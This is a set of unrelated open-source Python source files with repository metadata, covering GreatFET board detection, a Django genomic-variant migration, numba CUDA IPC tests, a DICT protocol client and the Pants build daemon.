# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'BatchOpenMPI.tex', u'BatchOpenMPI Documentation',
u'Antoine Dymond', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
|
{
"content_hash": "4b7e1f4bac362fcda328d009e375b0e2",
"timestamp": "",
"source": "github",
"line_count": 181,
"max_line_length": 80,
"avg_line_length": 32.94475138121547,
"alnum_prop": 0.7105483816870702,
"repo_name": "hamish2014/batchOpenMPI",
"id": "2b3fe3d307f41ca88fe08f398abea232412d3677",
"size": "6386",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/conf.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "39973"
},
{
"name": "Shell",
"bytes": "3218"
}
],
"symlink_target": ""
}
|
from .board import GreatFETBoard
# Ensure that we have access to all GreatFET boards. Normally, we'd avoid
# importing an entire namespace, but in this case, this allows us to ensure
# that all board modules are loaded for autoidentification.
from .boards import *
active_connections = {}
def GreatFET(**board_identifiers):
"""
Attempts to create a new instance of GreatFET board (sub)class
most applicable to the given device. For example, if the attached
board is a GreatFET One, this will automatically create a
GreatFETOne object.
Accepts the same arguments as pyusb's usb.find() method, allowing narrowing
to a more specific GreatFET by e.g. serial number. Like usb.find(), providing
find_all will return a list of all found devices.
Throws a DeviceNotFoundError if no device is available and find_all is not set.
"""
if 'find_all' in board_identifiers and board_identifiers['find_all']:
del board_identifiers['find_all']
return GreatFETBoard.autodetect_all(**board_identifiers)
else:
return GreatFETBoard.autodetect(**board_identifiers)
def GreatFETSingleton(serial=None):
""" Returns a GreatFET object, re-using an existing object if we already have a connection to the given GreatFET. """
# If we already have a GreatFET with the given serial,
if serial in active_connections:
device = active_connections[serial]
if device.comms.still_connected():
return device
# Otherwise, try to create a new GreatFET instance.
greatfet = GreatFET(serial_number=serial)
active_connections[serial] = greatfet
return greatfet
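if __name__ == '__main__':
    # Hedged usage sketch, not part of the package: with no board attached the
    # find_all form returns an empty list rather than raising.
    boards = GreatFET(find_all=True)
    print('found {} GreatFET board(s)'.format(len(boards)))
    if boards:
        gf = GreatFET()   # autodetects the most specific board subclass
        print('connected to {}'.format(gf))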
|
{
"content_hash": "73bdb9726f3e87d461115f896b6eb7ae",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 121,
"avg_line_length": 36.659574468085104,
"alnum_prop": 0.693557748113755,
"repo_name": "greatscottgadgets/greatfet",
"id": "5b90fcb4712de7ec4877f5a2f257dd0ae8461b46",
"size": "1760",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "host/greatfet/greatfet.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Assembly",
"bytes": "823"
},
{
"name": "C",
"bytes": "546689"
},
{
"name": "C++",
"bytes": "457321"
},
{
"name": "CMake",
"bytes": "20175"
},
{
"name": "Dockerfile",
"bytes": "601"
},
{
"name": "Makefile",
"bytes": "8176"
},
{
"name": "Python",
"bytes": "541237"
},
{
"name": "Shell",
"bytes": "2236"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.RunSQL("""DROP TABLE IF EXISTS variant CASCADE;
DROP FUNCTION IF EXISTS variant_fts_trigger();
"""),
migrations.CreateModel(
name='Variant',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
# These are some extra derived columns that help with filtering
('Variant_in_ENIGMA', models.BooleanField(default=False)),
('Variant_in_ClinVar', models.BooleanField(default=False)),
('Variant_in_1000_Genomes', models.BooleanField(default=False)),
('Variant_in_ExAC', models.BooleanField(default=False)),
('Variant_in_LOVD', models.BooleanField(default=False)),
('Variant_in_BIC', models.BooleanField(default=False)),
('Variant_in_ESP', models.BooleanField(default=False)),
('Variant_in_exLOVD', models.BooleanField(default=False)),
('Source', models.TextField()),
('URL_ENIGMA', models.TextField()),
('Condition_ID_type_ENIGMA', models.TextField()),
('Condition_ID_value_ENIGMA', models.TextField()),
('Condition_category_ENIGMA', models.TextField()),
('Clinical_significance_ENIGMA', models.TextField()),
('Date_last_evaluated_ENIGMA', models.TextField()),
('Assertion_method_ENIGMA', models.TextField()),
('Assertion_method_citation_ENIGMA', models.TextField()),
('Clinical_significance_citations_ENIGMA', models.TextField()),
('Comment_on_clinical_significance_ENIGMA', models.TextField()),
('Collection_method_ENIGMA', models.TextField()),
('Allele_origin_ENIGMA', models.TextField()),
('ClinVarAccession_ENIGMA', models.TextField()),
('Clinical_Significance_ClinVar', models.TextField()),
('Date_Last_Updated_ClinVar', models.TextField()),
('Submitter_ClinVar', models.TextField()),
('SCV_ClinVar', models.TextField()),
('Allele_Origin_ClinVar', models.TextField()),
('Method_ClinVar', models.TextField()),
('Functional_analysis_result_LOVD', models.TextField()),
('Origin_of_variant_LOVD', models.TextField()),
('Functional_analysis_technique_LOVD', models.TextField()),
('Variant_frequency_LOVD', models.TextField()),
('Variant_haplotype_LOVD', models.TextField()),
('Minor_allele_frequency_ESP', models.TextField()),
('EUR_Allele_frequency_1000_Genomes', models.TextField()),
('AFR_Allele_frequency_1000_Genomes', models.TextField()),
('AMR_Allele_frequency_1000_Genomes', models.TextField()),
('EAS_Allele_frequency_1000_Genomes', models.TextField()),
('Allele_frequency_1000_Genomes', models.TextField()),
('SAS_Allele_frequency_1000_Genomes', models.TextField()),
('Allele_frequency_ExAC', models.TextField()),
('Patient_nationality_BIC', models.TextField()),
('Clinical_importance_BIC', models.TextField()),
('Clinical_classification_BIC', models.TextField()),
('Literature_citation_BIC', models.TextField()),
('Number_of_family_member_carrying_mutation_BIC', models.TextField()),
('Germline_or_Somatic_BIC', models.TextField()),
('Ethnicity_BIC', models.TextField()),
('Mutation_type_BIC', models.TextField()),
('IARC_class_exLOVD', models.TextField()),
('Sum_family_LR_exLOVD', models.TextField()),
('Combined_prior_probablility_exLOVD', models.TextField()),
('Literature_source_exLOVD', models.TextField()),
('Co_occurrence_LR_exLOVD', models.TextField()),
('Posterior_probability_exLOVD', models.TextField()),
('Missense_analysis_prior_probability_exLOVD', models.TextField()),
('Segregation_LR_exLOVD', models.TextField()),
('SIFT_VEP', models.TextField()),
('PolyPhen_VEP', models.TextField()),
('Gene_Symbol', models.TextField()),
('Reference_Sequence', models.TextField()),
('HGVS_cDNA', models.TextField()),
('BIC_Identifier', models.TextField()),
('HGVS_Protein', models.TextField()),
('Protein_Change', models.TextField()),
('Allele_Frequency', models.TextField()),
('Max_Allele_Frequency', models.TextField()),
('Genomic_Coordinate_hg38', models.TextField()),
('Genomic_Coordinate_hg37', models.TextField()),
('Genomic_Coordinate_hg36', models.TextField()),
('Source_URL', models.TextField()),
('Discordant', models.TextField()),
('Synonyms', models.TextField()),
('Pathogenicity_default', models.TextField()),
('Pathogenicity_research', models.TextField()),
],
options={
'db_table': 'variant',
},
),
]
|
{
"content_hash": "7eddcd3370ccd614e407f36bd5fdef0e",
"timestamp": "",
"source": "github",
"line_count": 103,
"max_line_length": 114,
"avg_line_length": 54.679611650485434,
"alnum_prop": 0.5550426136363636,
"repo_name": "BD2KGenomics/brca-website",
"id": "8c069fe5e48e0e3d54caf85fbe58a750ff95dd54",
"size": "5704",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django/data/migrations/0001_initial.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "9933"
},
{
"name": "HTML",
"bytes": "724"
},
{
"name": "JavaScript",
"bytes": "132104"
},
{
"name": "Python",
"bytes": "69138"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, print_function, division
import sys
import multiprocessing as mp
import traceback
import pickle
import numpy as np
from numba import cuda
from numba.cuda.cudadrv import drvapi, devicearray
from numba import unittest_support as unittest
from numba.cuda.testing import skip_on_cudasim, CUDATestCase
not_linux = not sys.platform.startswith('linux')
has_mp_get_context = hasattr(mp, 'get_context')
def core_ipc_handle_test(the_work, result_queue):
try:
arr = the_work()
except:
# FAILED. propagate the exception as a string
succ = False
out = traceback.format_exc()
else:
# OK. send the ndarray back
succ = True
out = arr
result_queue.put((succ, out))
def base_ipc_handle_test(handle, size, result_queue):
def the_work():
dtype = np.dtype(np.intp)
with cuda.open_ipc_array(handle, shape=size // dtype.itemsize,
dtype=dtype) as darr:
# copy the data to host
return darr.copy_to_host()
core_ipc_handle_test(the_work, result_queue)
def serialize_ipc_handle_test(handle, result_queue):
def the_work():
dtype = np.dtype(np.intp)
darr = handle.open_array(cuda.current_context(),
shape=handle.size // dtype.itemsize,
dtype=dtype)
# copy the data to host
arr = darr.copy_to_host()
handle.close()
return arr
core_ipc_handle_test(the_work, result_queue)
def ipc_array_test(ipcarr, result_queue):
try:
with ipcarr as darr:
arr = darr.copy_to_host()
try:
# should fail to reopen
with ipcarr:
pass
except ValueError as e:
if str(e) != 'IpcHandle is already opened':
raise AssertionError('invalid exception message')
else:
raise AssertionError('did not raise on reopen')
except:
# FAILED. propagate the exception as a string
succ = False
out = traceback.format_exc()
else:
# OK. send the ndarray back
succ = True
out = arr
result_queue.put((succ, out))
@unittest.skipIf(not_linux, "IPC only supported on Linux")
@unittest.skipUnless(has_mp_get_context, "requires multiprocessing.get_context")
@skip_on_cudasim('Ipc not available in CUDASIM')
class TestIpcMemory(CUDATestCase):
def test_ipc_handle(self):
# prepare data for IPC
arr = np.arange(10, dtype=np.intp)
devarr = cuda.to_device(arr)
# create IPC handle
ctx = cuda.current_context()
ipch = ctx.get_ipc_handle(devarr.gpu_data)
# manually prepare for serialization as bytes
handle_bytes = bytes(ipch.handle)
size = ipch.size
# spawn new process for testing
ctx = mp.get_context('spawn')
result_queue = ctx.Queue()
args = (handle_bytes, size, result_queue)
proc = ctx.Process(target=base_ipc_handle_test, args=args)
proc.start()
succ, out = result_queue.get()
if not succ:
self.fail(out)
else:
np.testing.assert_equal(arr, out)
proc.join(3)
def check_ipc_handle_serialization(self, index_arg=None):
# prepare data for IPC
arr = np.arange(10, dtype=np.intp)
devarr = cuda.to_device(arr)
if index_arg is not None:
devarr = devarr[index_arg]
expect = devarr.copy_to_host()
# create IPC handle
ctx = cuda.current_context()
ipch = ctx.get_ipc_handle(devarr.gpu_data)
# pickle
buf = pickle.dumps(ipch)
ipch_recon = pickle.loads(buf)
self.assertIs(ipch_recon.base, None)
self.assertEqual(tuple(ipch_recon.handle), tuple(ipch.handle))
self.assertEqual(ipch_recon.size, ipch.size)
# spawn new process for testing
ctx = mp.get_context('spawn')
result_queue = ctx.Queue()
args = (ipch, result_queue)
proc = ctx.Process(target=serialize_ipc_handle_test, args=args)
proc.start()
succ, out = result_queue.get()
if not succ:
self.fail(out)
else:
np.testing.assert_equal(expect, out)
proc.join(3)
def test_ipc_handle_serialization(self):
# test no slicing
self.check_ipc_handle_serialization()
# slicing tests
self.check_ipc_handle_serialization(slice(3, None))
self.check_ipc_handle_serialization(slice(3, 8))
self.check_ipc_handle_serialization(slice(None, 8))
def check_ipc_array(self, index_arg=None):
# prepare data for IPC
arr = np.arange(10, dtype=np.intp)
devarr = cuda.to_device(arr)
# Slice
if index_arg is not None:
devarr = devarr[index_arg]
expect = devarr.copy_to_host()
ipch = devarr.get_ipc_handle()
# spawn new process for testing
ctx = mp.get_context('spawn')
result_queue = ctx.Queue()
args = (ipch, result_queue)
proc = ctx.Process(target=ipc_array_test, args=args)
proc.start()
succ, out = result_queue.get()
if not succ:
self.fail(out)
else:
np.testing.assert_equal(expect, out)
proc.join(3)
def test_ipc_array(self):
# test no slicing
self.check_ipc_array()
# slicing tests
self.check_ipc_array(slice(3, None))
self.check_ipc_array(slice(3, 8))
self.check_ipc_array(slice(None, 8))
@unittest.skipUnless(not_linux, "Only on OS other than Linux")
@skip_on_cudasim('Ipc not available in CUDASIM')
class TestIpcNotSupported(CUDATestCase):
def test_unsupported(self):
arr = np.arange(10, dtype=np.intp)
devarr = cuda.to_device(arr)
with self.assertRaises(OSError) as raises:
devarr.get_ipc_handle()
errmsg = str(raises.exception)
self.assertIn('OS does not support CUDA IPC', errmsg)
def staged_ipc_handle_test(handle, device_num, result_queue):
def the_work():
with cuda.gpus[device_num]:
this_ctx = cuda.devices.get_context()
can_access = handle.can_access_peer(this_ctx)
print('can_access_peer {} {}'.format(this_ctx, can_access))
deviceptr = handle.open_staged(this_ctx)
arrsize = handle.size // np.dtype(np.intp).itemsize
hostarray = np.zeros(arrsize, dtype=np.intp)
cuda.driver.device_to_host(
hostarray, deviceptr, size=handle.size,
)
handle.close()
return hostarray
core_ipc_handle_test(the_work, result_queue)
def staged_ipc_array_test(ipcarr, device_num, result_queue):
try:
with cuda.gpus[device_num]:
this_ctx = cuda.devices.get_context()
print(this_ctx.device)
with ipcarr as darr:
arr = darr.copy_to_host()
try:
# should fail to reopen
with ipcarr:
pass
except ValueError as e:
if str(e) != 'IpcHandle is already opened':
raise AssertionError('invalid exception message')
else:
raise AssertionError('did not raise on reopen')
except:
# FAILED. propagate the exception as a string
succ = False
out = traceback.format_exc()
else:
# OK. send the ndarray back
succ = True
out = arr
result_queue.put((succ, out))
@unittest.skipIf(not_linux, "IPC only supported on Linux")
@unittest.skipUnless(has_mp_get_context, "requires multiprocessing.get_context")
@skip_on_cudasim('Ipc not available in CUDASIM')
class TestIpcStaged(CUDATestCase):
def test_staged(self):
# prepare data for IPC
arr = np.arange(10, dtype=np.intp)
devarr = cuda.to_device(arr)
# spawn new process for testing
mpctx = mp.get_context('spawn')
result_queue = mpctx.Queue()
# create IPC handle
ctx = cuda.current_context()
ipch = ctx.get_ipc_handle(devarr.gpu_data)
# pickle
buf = pickle.dumps(ipch)
ipch_recon = pickle.loads(buf)
self.assertIs(ipch_recon.base, None)
self.assertEqual(tuple(ipch_recon.handle), tuple(ipch.handle))
self.assertEqual(ipch_recon.size, ipch.size)
# Test on every CUDA devices
for device_num in range(len(cuda.gpus)):
args = (ipch, device_num, result_queue)
proc = mpctx.Process(target=staged_ipc_handle_test, args=args)
proc.start()
succ, out = result_queue.get()
proc.join(3)
if not succ:
self.fail(out)
else:
np.testing.assert_equal(arr, out)
def test_ipc_array(self):
for device_num in range(len(cuda.gpus)):
# prepare data for IPC
arr = np.random.random(10)
devarr = cuda.to_device(arr)
ipch = devarr.get_ipc_handle()
# spawn new process for testing
ctx = mp.get_context('spawn')
result_queue = ctx.Queue()
args = (ipch, device_num, result_queue)
proc = ctx.Process(target=staged_ipc_array_test, args=args)
proc.start()
succ, out = result_queue.get()
proc.join(3)
if not succ:
self.fail(out)
else:
np.testing.assert_equal(arr, out)
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "ae1990792ade49fb1ee55c07432c266d",
"timestamp": "",
"source": "github",
"line_count": 299,
"max_line_length": 80,
"avg_line_length": 32.69899665551839,
"alnum_prop": 0.577477753912243,
"repo_name": "jriehl/numba",
"id": "cebf2a3af66222c1a655521f9f30a78e7d0c113e",
"size": "9777",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "numba/cuda/tests/cudapy/test_ipc.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "7023"
},
{
"name": "C",
"bytes": "657637"
},
{
"name": "C++",
"bytes": "49158"
},
{
"name": "Cuda",
"bytes": "214"
},
{
"name": "GDB",
"bytes": "101"
},
{
"name": "HTML",
"bytes": "3464"
},
{
"name": "Jupyter Notebook",
"bytes": "110326"
},
{
"name": "Python",
"bytes": "6611899"
},
{
"name": "Shell",
"bytes": "7290"
}
],
"symlink_target": ""
}
|
import socket, re
version = '1.0'
def dequote(str):
"""Will remove single or double quotes from the start and end of a string
and return the result."""
quotechars = "'\""
while len(str) and str[0] in quotechars:
str = str[1:]
while len(str) and str[-1] in quotechars:
str = str[0:-1]
return str
def enquote(str):
"""This function will put a string in double quotes, properly
escaping any existing double quotes with a backslash. It will
return the result."""
return '"' + str.replace('"', "\\\"") + '"'
class Connection:
"""This class is used to establish a connection to a database server.
You will usually use this as the first call into the dictclient library.
Instantiating it takes two optional arguments: a hostname (a string)
and a port (an int). The hostname defaults to localhost
and the port to 2628, the port specified in RFC 2229."""
def __init__(self, hostname = 'localhost', port = 2628):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((hostname, port))
self.rfile = self.sock.makefile("rt")
self.wfile = self.sock.makefile("wt", 0)
self.saveconnectioninfo()
def getresultcode(self):
"""Generic function to get a result code. It will return a list
consisting of two items: the integer result code and the text
following. You will not usually use this function directly."""
line = self.rfile.readline().strip()
code, text = line.split(' ', 1)
return [int(code), text]
def get200result(self):
"""Used when expecting a single line of text -- a 200-class
result. Returns [intcode, remaindertext]"""
code, text = self.getresultcode()
if code < 200 or code >= 300:
raise Exception, "Got '%s' when 200-class response expected" % \
line
return [code, text]
def get100block(self):
"""Used when expecting multiple lines of text -- gets the block
part only. Does not get any codes or anything! Returns a string."""
data = []
while 1:
line = self.rfile.readline().strip()
if line == '.':
break
data.append(line)
return "\n".join(data)
def get100result(self):
"""Used when expecting multiple lines of text, terminated by a period
and a 200 code. Returns: [initialcode, [bodytext_1lineperentry],
finalcode]"""
code, text = self.getresultcode()
if code < 100 or code >= 200:
raise Exception, "Got '%s' when 100-class response expected" % \
code
bodylines = self.get100block().split("\n")
code2 = self.get200result()[0]
return [code, bodylines, code2]
def get100dict(self):
"""Used when expecting a dictionary of results. Will read from
the initial 100 code, to a period and the 200 code."""
dict = {}
for line in self.get100result()[1]:
key, val = line.split(' ', 1)
dict[key] = dequote(val)
return dict
def saveconnectioninfo(self):
"""Called by __init__ to handle the initial connection. Will
save off the capabilities and messageid."""
code, string = self.get200result()
assert code == 220
capstr, msgid = re.search('<(.*)> (<.*>)$', string).groups()
self.capabilities = capstr.split('.')
self.messageid = msgid
def getcapabilities(self):
"""Returns a list of the capabilities advertised by the server."""
return self.capabilities
def getmessageid(self):
"""Returns the message id, including angle brackets."""
return self.messageid
def getdbdescs(self):
"""Gets a dict of available databases. The key is the db name
and the value is the db description. This command may generate
network traffic!"""
if hasattr(self, 'dbdescs'):
return self.dbdescs
self.sendcommand("SHOW DB")
self.dbdescs = self.get100dict()
return self.dbdescs
def getstratdescs(self):
"""Gets a dict of available strategies. The key is the strat
name and the value is the strat description. This call may
generate network traffic!"""
if hasattr(self, 'stratdescs'):
return self.stratdescs
self.sendcommand("SHOW STRAT")
self.stratdescs = self.get100dict()
return self.stratdescs
def getdbobj(self, dbname):
"""Gets a Database object corresponding to the database name passed
in. This function explicitly will *not* generate network traffic.
If you have not yet run getdbdescs(), it will fail."""
if not hasattr(self, 'dbobjs'):
self.dbobjs = {}
if self.dbobjs.has_key(dbname):
return self.dbobjs[dbname]
# We use self.dbdescs explicitly since we don't want to
# generate net traffic with this request!
if dbname != '*' and dbname != '!' and \
not dbname in self.dbdescs.keys():
raise Exception, "Invalid database name '%s'" % dbname
self.dbobjs[dbname] = Database(self, dbname)
return self.dbobjs[dbname]
def sendcommand(self, command):
"""Takes a command, without a newline character, and sends it to
the server."""
self.wfile.write(command + "\n")
def define(self, database, word):
"""Returns a list of Definition objects for each matching
definition. Parameters are the database name and the word
to look up. This is one of the main functions you will use
to interact with the server. Returns a list of Definition
objects. If there are no matches, an empty list is returned.
Note: database may be '*' which means to search all databases,
or '!' which means to return matches from the first database that
has a match."""
self.getdbdescs() # Prime the cache
if database != '*' and database != '!' and \
not database in self.getdbdescs():
raise Exception, "Invalid database '%s' specified" % database
self.sendcommand("DEFINE " + enquote(database) + " " + enquote(word))
code = self.getresultcode()[0]
retval = []
if code == 552:
# No definitions.
return []
if code != 150:
raise Exception, "Unknown code %d" % code
while 1:
code, text = self.getresultcode()
if code != 151:
break
resultword, resultdb = re.search('^"(.+)" (\S+)', text).groups()
defstr = self.get100block()
retval.append(Definition(self, self.getdbobj(resultdb),
resultword, defstr))
return retval
def match(self, database, strategy, word):
"""Gets matches for a query. Arguments are database name,
the strategy (see available ones in getstratdescs()), and the
pattern/word to look for. Returns a list of Definition objects.
If there is no match, an empty list is returned.
Note: database may be '*' which means to search all databases,
or '!' which means to return matches from the first database that
has a match."""
self.getstratdescs() # Prime the cache
self.getdbdescs() # Prime the cache
if not strategy in self.getstratdescs().keys():
raise Exception, "Invalid strategy '%s'" % strategy
if database != '*' and database != '!' and \
not database in self.getdbdescs().keys():
raise Exception, "Invalid database name '%s'" % database
self.sendcommand("MATCH %s %s %s" % (enquote(database),
enquote(strategy),
enquote(word)))
code = self.getresultcode()[0]
if code == 552:
# No Matches
return []
if code != 152:
raise Exception, "Unexpected code %d" % code
retval = []
for matchline in self.get100block().split("\n"):
matchdict, matchword = matchline.split(" ", 1)
retval.append(Definition(self, self.getdbobj(matchdict),
dequote(matchword)))
        finalcode = self.getresultcode()[0]
        if finalcode != 250:
            raise Exception, "Unexpected end-of-list code %d" % finalcode
return retval
class Database:
"""An object corresponding to a particular database in a server."""
def __init__(self, dictconn, dbname):
"""Initialize the object -- requires a Connection object and
a database name."""
self.conn = dictconn
self.name = dbname
def getname(self):
"""Returns the short name for this database."""
return self.name
def getdescription(self):
if hasattr(self, 'description'):
return self.description
if self.getname() == '*':
self.description = 'All Databases'
elif self.getname() == '!':
self.description = 'First matching database'
else:
self.description = self.conn.getdbdescs()[self.getname()]
return self.description
def getinfo(self):
"""Returns a string of info describing this database."""
if hasattr(self, 'info'):
return self.info
if self.getname() == '*':
self.info = "This special database will search all databases on the system."
elif self.getname() == '!':
self.info = "This special database will return matches from the first matching database."
else:
self.conn.sendcommand("SHOW INFO " + self.name)
self.info = "\n".join(self.conn.get100result()[1])
return self.info
def define(self, word):
"""Get a definition from within this database.
The argument, word, is the word to look up. The return value is the
same as from Connection.define()."""
return self.conn.define(self.getname(), word)
def match(self, strategy, word):
"""Get a match from within this database.
The argument, word, is the word to look up. The return value is
the same as from Connection.define()."""
return self.conn.match(self.getname(), strategy, word)
class Definition:
"""An object corresponding to a single definition."""
def __init__(self, dictconn, db, word, defstr = None):
"""Instantiate the object. Requires: a Connection object,
a Database object (NOT corresponding to '*' or '!' databases),
a word. Optional: a definition string. If not supplied,
it will be fetched if/when it is requested."""
self.conn = dictconn
self.db = db
self.word = word
self.defstr = defstr
def getdb(self):
"""Get the Database object corresponding to this definition."""
return self.db
def getdefstr(self):
"""Get the definition string (the actual content) of this
definition."""
if not self.defstr:
self.defstr = self.conn.define(self.getdb().getname(), self.word)[0].getdefstr()
return self.defstr
def getword(self):
"""Get the word this object describes."""
return self.word
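if __name__ == '__main__':
    # Hedged usage sketch, not part of the module: assumes a DICT protocol
    # server (for example a local dictd) is listening on localhost:2628.
    conn = Connection('localhost')
    print "Databases:", ", ".join(conn.getdbdescs().keys())
    for d in conn.define('!', 'dictionary'):
        print "From %s (%s):" % (d.getdb().getname(), d.getdb().getdescription())
        print d.getdefstr()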
|
{
"content_hash": "4e892058775a935f55792d0fadf34b7f",
"timestamp": "",
"source": "github",
"line_count": 299,
"max_line_length": 101,
"avg_line_length": 38.62207357859532,
"alnum_prop": 0.5886733633529615,
"repo_name": "mazaclub/mazabot-core",
"id": "8701dbf9ad107c419970effe3309674b76147f65",
"size": "12367",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "plugins/Dict/local/dictclient.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "2344559"
},
{
"name": "Shell",
"bytes": "454"
}
],
"symlink_target": ""
}
|
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import logging
import os
import sys
import threading
from setproctitle import setproctitle as set_process_title
from pants.base.build_environment import get_buildroot
from pants.base.exiter import Exiter
from pants.bin.daemon_pants_runner import DaemonExiter, DaemonPantsRunner
from pants.bin.engine_initializer import EngineInitializer
from pants.engine.native import Native
from pants.init.target_roots import TargetRoots
from pants.logging.setup import setup_logging
from pants.option.arg_splitter import GLOBAL_SCOPE
from pants.option.options_bootstrapper import OptionsBootstrapper
from pants.option.options_fingerprinter import OptionsFingerprinter
from pants.pantsd.process_manager import FingerprintedProcessManager
from pants.pantsd.service.fs_event_service import FSEventService
from pants.pantsd.service.pailgun_service import PailgunService
from pants.pantsd.service.scheduler_service import SchedulerService
from pants.pantsd.watchman_launcher import WatchmanLauncher
from pants.util.collections import combined_dict
from pants.util.memo import memoized_property
class _LoggerStream(object):
"""A sys.{stdout,stderr} replacement that pipes output to a logger."""
def __init__(self, logger, log_level, logger_stream):
"""
:param logging.Logger logger: The logger instance to emit writes to.
:param int log_level: The log level to use for the given logger.
:param file logger_stream: The underlying file object the logger is writing to, for
determining the fileno to support faulthandler logging.
"""
self._logger = logger
self._log_level = log_level
self._stream = logger_stream
def write(self, msg):
for line in msg.rstrip().splitlines():
self._logger.log(self._log_level, line.rstrip())
def flush(self):
return
def isatty(self):
return False
def fileno(self):
return self._stream.fileno()
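# Hedged illustration, not part of pantsd: the redirection pattern above can be
# exercised in isolation roughly as follows (names are example-only); pantsd
# itself wires this up in PantsDaemon._setup_logging below.
#
#     logging.basicConfig(level=logging.INFO)
#     sys.stdout = _LoggerStream(logging.getLogger('demo'), logging.INFO, sys.__stdout__)
#     print('hello')   # emitted as an INFO log record instead of raw stdout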
class PantsDaemon(FingerprintedProcessManager):
"""A daemon that manages PantsService instances."""
JOIN_TIMEOUT_SECONDS = 1
LOG_NAME = 'pantsd.log'
class StartupFailure(Exception):
"""Represents a failure to start pantsd."""
class RuntimeFailure(Exception):
"""Represents a pantsd failure at runtime, usually from an underlying service failure."""
class Factory(object):
@classmethod
def create(cls, bootstrap_options=None):
"""
:param Options bootstrap_options: The bootstrap options, if available.
"""
bootstrap_options = bootstrap_options or cls._parse_bootstrap_options()
bootstrap_options_values = bootstrap_options.for_global_scope()
build_root = get_buildroot()
native = Native.create(bootstrap_options_values)
# TODO: https://github.com/pantsbuild/pants/issues/3479
watchman = WatchmanLauncher.create(bootstrap_options_values).watchman
legacy_graph_helper = cls._setup_legacy_graph_helper(native, bootstrap_options_values)
services, port_map = cls._setup_services(
build_root,
bootstrap_options_values,
legacy_graph_helper,
watchman
)
return PantsDaemon(
native,
build_root,
bootstrap_options_values.pants_workdir,
bootstrap_options_values.level.upper(),
legacy_graph_helper.scheduler.lock,
services,
port_map,
bootstrap_options_values.pants_subprocessdir,
bootstrap_options
)
@staticmethod
def _parse_bootstrap_options():
return OptionsBootstrapper().get_bootstrap_options()
@staticmethod
def _setup_legacy_graph_helper(native, bootstrap_options):
"""Initializes a `LegacyGraphHelper` instance."""
return EngineInitializer.setup_legacy_graph(
bootstrap_options.pants_ignore,
bootstrap_options.pants_workdir,
native=native,
build_ignore_patterns=bootstrap_options.build_ignore,
exclude_target_regexps=bootstrap_options.exclude_target_regexp,
subproject_roots=bootstrap_options.subproject_roots,
)
@staticmethod
def _setup_services(build_root, bootstrap_options, legacy_graph_helper, watchman):
"""Initialize pantsd services.
:returns: A tuple of (`tuple` service_instances, `dict` port_map).
"""
fs_event_service = FSEventService(watchman, build_root, bootstrap_options.pantsd_fs_event_workers)
scheduler_service = SchedulerService(fs_event_service, legacy_graph_helper)
pailgun_service = PailgunService(
bind_addr=(bootstrap_options.pantsd_pailgun_host, bootstrap_options.pantsd_pailgun_port),
exiter_class=DaemonExiter,
runner_class=DaemonPantsRunner,
target_roots_class=TargetRoots,
scheduler_service=scheduler_service
)
return (
# Services.
(fs_event_service, scheduler_service, pailgun_service),
# Port map.
dict(pailgun=pailgun_service.pailgun_port)
)
def __init__(self, native, build_root, work_dir, log_level, lock, services, socket_map,
metadata_base_dir, bootstrap_options=None):
"""
:param Native native: A `Native` instance.
:param string build_root: The pants build root.
:param string work_dir: The pants work directory.
:param string log_level: The log level to use for daemon logging.
:param string metadata_base_dir: The ProcessManager metadata base dir.
:param Options bootstrap_options: The bootstrap options, if available.
"""
super(PantsDaemon, self).__init__(name='pantsd', metadata_base_dir=metadata_base_dir)
self._native = native
self._build_root = build_root
self._work_dir = work_dir
self._log_level = log_level
self._lock = lock
self._services = services
self._socket_map = socket_map
self._bootstrap_options = bootstrap_options
self._log_dir = os.path.join(work_dir, self.name)
self._logger = logging.getLogger(__name__)
# N.B. This Event is used as nothing more than a convenient atomic flag - nothing waits on it.
self._kill_switch = threading.Event()
self._exiter = Exiter()
@memoized_property
def watchman_launcher(self):
return WatchmanLauncher.create(self._bootstrap_options.for_global_scope())
@property
def is_killed(self):
return self._kill_switch.is_set()
@property
def options_fingerprint(self):
return OptionsFingerprinter.combined_options_fingerprint_for_scope(
GLOBAL_SCOPE,
self._bootstrap_options,
fingerprint_key='daemon',
invert=True
)
def shutdown(self, service_thread_map):
"""Gracefully terminate all services and kill the main PantsDaemon loop."""
with self._lock:
for service, service_thread in service_thread_map.items():
self._logger.info('terminating pantsd service: {}'.format(service))
service.terminate()
service_thread.join()
self._logger.info('terminating pantsd')
self._kill_switch.set()
@staticmethod
def _close_fds():
"""Close stdio streams to avoid output in the tty that launched pantsd."""
for fd in (sys.stdin, sys.stdout, sys.stderr):
file_no = fd.fileno()
fd.flush()
fd.close()
os.close(file_no)
def _setup_logging(self, log_level):
"""Initializes logging."""
# Reinitialize logging for the daemon context.
result = setup_logging(log_level, log_dir=self._log_dir, log_name=self.LOG_NAME)
# Close out tty file descriptors.
self._close_fds()
# Redirect stdio to the root logger.
sys.stdout = _LoggerStream(logging.getLogger(), logging.INFO, result.log_stream)
